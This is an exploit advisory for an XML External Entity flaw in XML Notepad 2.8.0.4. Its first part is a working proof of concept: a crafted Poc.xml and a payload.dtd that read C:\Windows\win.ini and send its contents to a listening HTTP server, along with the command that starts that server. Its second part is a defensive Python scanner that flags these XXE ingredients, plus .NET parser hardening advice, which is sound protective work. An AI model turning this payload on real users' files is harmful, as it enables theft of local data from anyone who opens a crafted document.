
# Exploit Title: XML Notepad 2.8.0.4 - XML External Entity Injection
# Date: 2019-11-11
# Exploit Author: 8-Team / daejinoh
# Vendor Homepage: https://www.microsoft.com/
# Software Link: https://github.com/microsoft/XmlNotepad
# Version: XML Notepad 2.8.0.4
# Tested on: Windows 10 Pro
# CVE : N/A

# Step

1) File -> Open -> *.xml


# Exploit Code

1) Server (Python 3.7): python -m http.server

2) Poc.xml:

<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "C:\Windows\win.ini">
<!ENTITY % dtd SYSTEM "http://127.0.0.1:8000/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>

3) payload.dtd:

<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://127.0.0.1:8000?%file;'>">
%all;
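The chain above works because a DTD-aware parser fetches SYSTEM identifiers on the document's behalf: the first parameter entity reads a local file, the second pulls a remote DTD that splices that content into a URL. A defender-side triage function that flags those ingredients before a file reaches such a parser, written here as an added example (not the advisory's or XML Notepad's code); the sample document is constructed to match the shape of Poc.xml, and nothing is resolved or fetched:

```python
"""Pre-parse triage for the XXE ingredients used above: external (SYSTEM/PUBLIC)
DTDs or entities and %param; references in the DOCTYPE. Nothing is resolved."""
import re
from dataclasses import dataclass, field

# Constructed sample shaped like the advisory's Poc.xml (loopback placeholders only).
SAMPLE_XXE = """<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "C:\\Windows\\win.ini">
<!ENTITY % dtd SYSTEM "http://127.0.0.1:8000/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>"""

_EXT_DTD_RE = re.compile(r'<!DOCTYPE\s+\S+\s+(?:SYSTEM|PUBLIC)\s+(?P<args>[^\[>]*)', re.I)
_ENTITY_RE = re.compile(r'<!ENTITY\s+(?P<pe>%\s*)?(?P<name>[^\s>]+)\s+'
                        r'(?:SYSTEM|PUBLIC)\s+(?P<args>[^>]*)>', re.I)
_PE_REF_RE = re.compile(r'%(?P<name>[A-Za-z_][\w.-]*);')  # a %dtd; style reference

@dataclass
class XxeFindings:
    has_doctype: bool = False
    external_dtd: str = ''                                 # URI on the DOCTYPE line
    external_entities: list = field(default_factory=list)  # (name, is_param, uri)
    param_refs: list = field(default_factory=list)         # names used as %x;

    @property
    def risky(self) -> bool:  # any one of these lets the parser do I/O for the file
        return bool(self.external_dtd or self.external_entities or self.param_refs)

def _last_uri(args: str) -> str:
    lits = re.findall(r'"[^"]*"|\'[^\']*\'', args)  # SYSTEM: one literal; PUBLIC: two
    return lits[-1].strip('"\'') if lits else ''     # the last one is always the URI

def scan_for_xxe(xml_text: str) -> XxeFindings:
    """Inspect only the DOCTYPE span; element content is never parsed."""
    f = XxeFindings()
    start = xml_text.find('<!DOCTYPE')
    if start < 0:
        return f                      # no DTD, so no way to declare entities
    f.has_doctype = True
    # An internal subset exists when '[' precedes the first '>' of the declaration.
    tail, width = (']>', 2) if -1 < xml_text.find('[', start) < xml_text.find('>', start) else ('>', 1)
    close = xml_text.find(tail, start)
    span = xml_text[start:close + width] if close >= 0 else xml_text[start:]
    m = _EXT_DTD_RE.match(span)
    if m:
        f.external_dtd = _last_uri(m.group('args'))
    for m in _ENTITY_RE.finditer(span):
        f.external_entities.append((m.group('name'), bool(m.group('pe')), _last_uri(m.group('args'))))
    f.param_refs = [m.group('name') for m in _PE_REF_RE.finditer(span)]
    return f
```

In .NET, where XML Notepad lives, the parser-side fix is an XmlReaderSettings with DtdProcessing set to DtdProcessing.Prohibit (or at minimum XmlResolver = null); this scanner is only the cheap triage step for untrusted files before they reach any DTD-aware parser.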